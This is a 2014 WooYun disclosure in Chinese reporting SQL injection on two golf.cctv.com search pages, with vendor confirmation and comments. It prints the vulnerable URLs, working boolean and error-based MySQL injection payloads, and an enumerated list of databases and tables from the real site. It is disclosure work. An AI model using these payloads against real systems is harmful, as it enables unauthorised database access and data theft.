当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080093

漏洞标题:中国网络电视台某站存在SQL注射影响大量数据库

相关厂商:中国网络电视台

漏洞作者: 紫霞仙子

提交时间:2014-10-20 12:03

修复时间:2014-12-04 12:04

公开时间:2014-12-04 12:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-20: 细节已通知厂商并且等待厂商处理中
2014-10-24: 厂商已经确认,细节仅向厂商公开
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-04: 细节向公众公开

简要描述:

今天早上没吃早点!

详细说明:

多处存在:
1.http://golf.cctv.com/e/extend/court/court_search.php?pt=%E5%8C%97%E4%BA%AC
单引号报错。
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\xE5\x8C\x97\xE4\xBA\xAC''' at line 1
select count(*) as total from photo_golf.court_information where region = '北京''
Payload: pt=%E5%8C%97%E4%BA%AC' AND 7950=7950 AND 'SfSw'='SfSw
Payload: pt=%E5%8C%97%E4%BA%AC' AND (SELECT 4139 FROM(SELECT COUNT(*),CONCAT
(0x7169616d71,(SELECT (CASE WHEN (4139=4139) THEN 1 ELSE 0 END)),0x7171667371,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OOVO'
='OOVO
---
2.http://golf.cctv.com/e/extend/dc_list.php?key=
Payload: key=%' AND EXTRACTVALUE(4489,CONCAT(0x5c,0x716a696571,(SELECT (CASE WHEN (4489=4489) THEN 1 ELSE 0 END)),0x716f777a71)) AND '%'='
back-end DBMS: MySQL
available databases [11]:
[*] fungolf
[*] information_schema
[*] matchnews_sys_dev
[*] mysql
[*] new
[*] performance_schema
[*] photo_golf
[*] sgagolf
[*] sns
[*] test
[*] we7

漏洞证明:

贴出一部分数据库
| phome_ecms_infoclass_qiuchang |
| phome_ecms_infoclass_scheduler |
| phome_ecms_infoclass_shop |
| phome_ecms_infoclass_teacher |
| phome_ecms_infoclass_vipmember |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_course |
| phome_ecms_infotmp_customer |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_educ |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_golfcourse |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_mark |
| phome_ecms_infotmp_money |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_player |
| phome_ecms_infotmp_point |
| phome_ecms_infotmp_qiuchang |
| phome_ecms_infotmp_scheduler |
| phome_ecms_infotmp_shop |
| phome_ecms_infotmp_teacher |
| phome_ecms_infotmp_vipmember |
| phome_ecms_mark |
| phome_ecms_mark_data_1 |
| phome_ecms_mark_doc |
| phome_ecms_mark_doc_data |
| phome_ecms_money |
| phome_ecms_money_data_1 |
| phome_ecms_money_doc |
| phome_ecms_money_doc_data |
| phome_ecms_movie |
| phome_ecms_movie_bk |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_data_1_bk |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_bk |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_data_bk |
| phome_ecms_news |
| phome_ecms_news_copy |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_player |
| phome_ecms_player_data_1 |
| phome_ecms_player_doc |
| phome_ecms_player_doc_data |
| phome_ecms_point |
| phome_ecms_point_data_1 |
| phome_ecms_point_doc |
| phome_ecms_point_doc_data |
| phome_ecms_qiuchang |
| phome_ecms_qiuchang_data_1 |
| phome_ecms_qiuchang_doc |
| phome_ecms_qiuchang_doc_data |
| phome_ecms_scheduler |
| phome_ecms_scheduler_data_1 |
| phome_ecms_scheduler_doc |
| phome_ecms_scheduler_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_teacher |
| phome_ecms_teacher_data_1 |
| phome_ecms_teacher_doc |
| phome_ecms_teacher_doc_data |
| phome_ecms_vipmember |
| phome_ecms_vipmember_data_1 |
| phome_ecms_vipmember_doc |
| phome_ecms_vipmember_doc_data |
| phome_edm |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadclick |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
| scheduler |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_app_ask |
| uchome_app_ask_reply |
| uchome_app_brand |
| uchome_app_brand_player |
| uchome_app_brand_reply |
| uchome_app_brand_view |
| uchome_appcreditlog |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_cache |
| uchome_class |
| uchome_click |
| uchome_clickuser |
| uchome_comment |
| uchome_config |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_friend |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_news_category |
| uchome_news_detail |
| uchome_news_responds |
| uchome_notification |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_profield |
| uchome_profilefield |
| uchome_report |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_spacefield |
| uchome_spacelog |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_userapp |
| uchome_userappfield |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_usertask |
| uchome_visitor |

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-24 10:49

厂商回复:

非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~

最新状态:

暂无


漏洞评价:

评论

  1. 2014-10-26 18:35 | sutdy ( 普通白帽子 | Rank:101 漏洞数:33 | 0.0)

    我擦 cntv啊

  2. 2014-12-04 15:44 | 脚本小伙 ( 实习白帽子 | Rank:52 漏洞数:15 | 小书童)

    帝国程序...不知道其他的会不会也会有呢

  3. 2015-07-07 16:42 | zsmj ( 实习白帽子 | Rank:40 漏洞数:5 | 不问留言,不言寂寞!)

    应该都是工具,批量跑出来的吧

  4. 2015-07-07 16:48 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @zsmj 机械化工具逐渐代替了手工劳动,省时高效。

  5. 2015-07-08 08:41 | zsmj ( 实习白帽子 | Rank:40 漏洞数:5 | 不问留言,不言寂寞!)

    那么仙子能不能分享一下你的超级神器,584266759@qq.com仙子是天,仙子是地,仙子是唯一的神话

  6. 2015-07-08 10:02 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @zsmj 慢慢学习,自己写一个吧,或者用市面上公开的工具。先学习吧。

  7. 2015-07-08 12:11 | zsmj ( 实习白帽子 | Rank:40 漏洞数:5 | 不问留言,不言寂寞!)

    @紫霞仙子 (;′⌒`)